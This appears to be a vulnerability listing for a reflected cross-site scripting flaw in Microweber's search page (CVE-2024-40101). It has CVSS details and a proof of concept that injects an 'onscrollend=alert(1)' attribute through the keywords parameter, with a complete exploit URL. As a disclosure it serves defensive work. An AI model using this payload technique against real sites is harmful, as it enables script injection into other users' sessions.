CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
21.3%
Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.
# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Prerak Mittal
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15
# Version: <=v2.0.15
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-40101
# Description:
## App Installation:
1. Clone the repository and build the application using docker:
```
git clone -b v2.0.15 https://github.com/microweber/microweber.git
cd microweber
docker compose up -d
```
2. Visit http://localhost
3. Follow along the UI installation process.
## Steps to reproduce:
1. Visit http://localhost/search
2. Insert the below payload in `keywords` parameter:
"onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"
Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22
3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
21.3%